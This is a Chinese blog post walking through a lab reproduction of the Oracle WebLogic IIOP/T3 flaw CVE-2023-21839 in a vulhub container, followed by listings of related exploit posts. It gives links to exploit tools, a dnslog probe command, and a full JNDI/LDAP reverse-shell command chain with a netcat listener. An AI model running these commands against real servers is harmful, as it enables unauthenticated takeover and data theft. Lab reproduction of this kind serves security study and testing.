Oracle WebLogic Server Core 安全漏洞(CVE-2023-21839)复现

已于 2024-07-08 16:33:22 修改
阅读量966 收藏 8
点赞数 7
文章标签: oracle 数据库
于 2024-07-08 16:29:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77132421/article/details/140212480
版权

一、漏洞概述

由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

二、影响范围

Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0

三、环境搭建

进入路径: ~/vulhub/weblogic/CVE-2023-21839

创建并后台运行所有容器:docker-compose up -d

显示所有容器:docker-compose ps

显示环境端口为7001端口

访问:http://127.0.0.1:7001/console

环境搭建成功

四、漏洞复现

1、dns log 探测

首先确定靶机的ip为:192.168.41.142

攻击机需要安装java1.8版本,我这里使用的本机进行测试

下载exp的jar包:GitHub - DXask88MA/Weblogic-CVE-2023-21839Contribute to DXask88MA/Weblogic-CVE-2023-21839 development by creating an account on GitHub.icon-default.png?t=N7T8https://github.com/DXask88MA/Weblogic-CVE-2023-21839

验证时还需要使用dnslog平台:DNSLog Platformicon-default.png?t=N7T8http://www.dnslog.cn/

先得到子域名

在jar包的路径下执行命令:java -jar Weblogic-CVE-2023-21839.jar 靶场ip:7001 ldap:// mmal09.dnslog.cn

刷新dns log 得到解析记录

2、反弹shell

首先需要安装java jdk 1.8的版本

安装jndi注入工具:JNDIExploit.v1.2

链接:https://pan.baidu.com/s/1Qn9vRO7ZCphqEAQ7TZ6TKg 提取码:9527

在java jdk的bin目录下执行命令:./java -jar /home/kali/Desktop/JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.41.142

开启nc工具,对3333端口进行监听

用之前的Weblogic-CVE-2023-21839.jar包进行攻击测试:

./java -jar /home/kali/Desktop/Weblogic-CVE-2023-21839.jar 127.0.0.1:7001 ldap://192.168.41.142:1389/Basic/ReverseShell/192.168.41.142/3333

回到监听

成功拿到shell

小龙0
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
0xSec
02-11 5364
WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏易受攻击的WebLogic服务器,成功利用此漏洞可能导致Oracle WebLogic服务器被接管或敏感信息泄露。
烽火狼烟丨Oracle WebLogic多个组件漏洞风险提示
C20220511的博客
04-27 289
近日,WebRAY安全服务产品线监测到Oracle官方发布了安全更新,本次共发布了包含WebLogic在内的433个产品的安全补丁程序,其中CVE-2023-21912、CVE-2023-21996、CVE-2023-21964、CVE-2023-21931、CVE-2023-21979等较为严重。CVE-2023-21996:未经身份验证的攻击者可以通过HTTP协议进行网络访问从而实施拒绝服务攻击,成功利用该漏洞可能导致Oracle WebLogic Server服务挂起或频繁崩溃。
oracle weblogic uddi,weblogic 安全漏洞问题解决
weixin_42465297的博客
04-14 749
1 weblogic控制台地址暴露 ²整改方法:禁用weblogic控制台。在weblogic域(sguap-domain和base-domain)的config下的config.xml中下面添加false。 禁用成功后如下图所示: 2.1.2存在Java反序列漏洞 ²整改方法:方法一、更新weblogic自带jar包。升级Apache Commons Collections的bug修复版...
Weblogic远程代码执行漏洞 CVE-2023-21839
昀光Icrus的博客
04-10 1084
记录个人在本地环境下复现Weblogic远程命令执行漏洞CVE-2023-21839的过程,每一步都将使用的工具下载地址附在了链接中,用于记录学习
【漏洞复现Weblogic CVE-2023-21839
zg_111的博客
03-23 6510
Weblogic CVE-2023-21839漏洞复现
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现
qq_42430287的博客
12-20 1935
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现
Weblogic远程代码执行漏洞(CVE-2023-21839复现/保姆级讲解
BGiscool的博客
02-28 4531
由于WeblogicIIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求,最终导致在目标服务器上访问敏感信息并执行任意代码。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 8085
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
m0_60721649的博客
04-06 1257
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**薪资区间6k-15k。
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞(CVE-2018-2625)补丁包
08-17
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞(CVE-2018-2625) 补丁包 对应的weblogic的版本是12.1.3.0 有需要的下载
JNDIExploit.v1.4 Weblogic-CVE-2023-21839
03-10
2023年,Weblogic服务器被发现存在一个名为CVE-2023-21839安全漏洞,该漏洞源于Weblogic Server对JNDI的不安全配置。攻击者可以通过构造恶意的JNDI引用,诱导服务器执行远程代码,从而实现远程命令执行。这种...
weblogic-CVE-2023-21839-JNDIExploit-1.4-SNAPSHOT.jar
02-28
weblogic-CVE-2023-21839-JNDIExploit-1.4-SNAPSHOT.jar
Oracle 19c中的私有临时表
专注于数据库技术分享,包含但不限于Oracle,MySQL,PostgreSQL,ElasticSearch及国产数据库等
08-08 401
Oracle 19c中,私有临时表(Private Temporary Tables, PTTs)是一种新的特性,它提供了一种不同于全局临时表(Global Temporary Tables, GTTs)的临时数据存储机制。私有临时表的设计是为了提高性能和简化临时数据的管理。私有临时表的主要特点包括:会话私有:内存驻留:生命周期管理:定义的私有性:无需显式清理:创建私有临时表可以使用语句,类似于创建普通表,但添加了关键字。例如: 这里指定了在事务提交后保留表中的数据。如果不指定此选项,默认行为是在事务提交
Oracle parameters 调优
最新发布
jnrjian的博客
08-12 566
隐含参数 _undo_autotune 负责 undo retention(即 undo 段的保持时间)的自动调整,若由 Oracle 自动负责 undo retention,则 Oracle 会根据事务量来占用 undo 表空间,可能会形成 undo 表空间的争用,建议将其关闭。参数 _optimizer_null_aware_antijoin 是在 Oracle 11g 引入的新参数,它用于解决在反连接(Anti-Join)时,关联列上存在空值(NULL)或关联列无非空约束的问题。
OceanBase V4.2特性解析:OB Oracle模式下的 SDO_GEOMETRY 空间数据类型
OceanBase分布式数据库的博客
08-09 1189
SDO_GEOMETRY类型特性在OceanBase V4.2.2版本发布,补齐Oracle模式下支持空间数据类型的功能。对于涉及位置信息服务和地理位置信息应用而言,数据库中具备对sdo_geometry数据类型的支持无疑将更好地支撑空间数据的存取与分析过程。
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882 和 CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值